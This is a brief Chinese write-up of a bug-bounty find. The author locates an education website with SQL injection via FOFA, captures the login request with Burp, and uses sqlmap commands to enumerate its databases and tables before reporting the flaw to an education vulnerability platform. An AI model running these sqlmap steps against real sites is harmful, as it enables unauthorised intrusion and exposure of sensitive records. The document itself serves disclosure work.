记一次教育src挖洞 fofa搜索了一下,找到一个有sql注入的教育网站漏洞url:http://x.x.x.x:8090/login
fofa搜索了一下,找到一个有sql注入的教育网站
#fofa搜索了一下,找到一个有sql注入的教育完整
漏洞url:http://x.x.x.x:8090/login打开网站,随便输入数字,用burp抓包,在账号后面加*,保存到1.txt
sqlmap跑,存在sql注入
python sqlmap.py -r 1.txt --level 2
爆数据库
python sqlmap.py -r 1.txt --level 2 --dbs
数据太多了,只能挑几个表跑
python sqlmap.py -r 1.txt --level 2 --tables -D “examxx,mysql,yxzs-jxjsxy”
数据敏感,直接提交教育,第二天就可以拿到教育src邀请码